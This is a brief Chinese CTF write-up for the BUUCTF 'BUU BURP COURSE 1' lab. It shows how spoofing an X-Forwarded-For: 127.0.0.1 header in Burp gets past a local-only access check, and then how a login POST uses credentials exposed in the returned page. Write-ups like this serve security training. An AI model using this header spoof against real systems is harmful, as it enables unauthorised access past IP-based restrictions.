BUU BURP COURSE 1
帶新手走進神秘的HTTP協議 - 超超boy - 部落格園
HTTP 首部欄位詳細介紹 - 超超boy - 部落格園
開啟靶機發現只能本地訪問,因此拿 bp 抓包,修一下請求頭。經過一番嘗試,加 X-Forwarded-For:127.0.0.1 成功訪問了。得到一段 html
<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta charset="UTF-8">
<title>登入</title>
</head>
<body>
<div style="text-align: center">
<form action="" method="post">
使用者名稱:<input type="text" name="username" value="admin"/><br>
密碼:<input type="password" name="password" value="wwoj2wio2jw93ey43eiuwdjnewkndjlwe"/><br>
<input type="submit" value="登入"/>
</form>
</div>
</body>
</html>
用 POST 方法按照給出的賬號密碼登入即可。
POST / HTTP/1.1
Host: 1994e278-3628-4701-a30c-79ce5314c08d.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
X-Forwarded-For:127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
username=admin&password=wwoj2wio2jw93ey43eiuwdjnewkndjlwe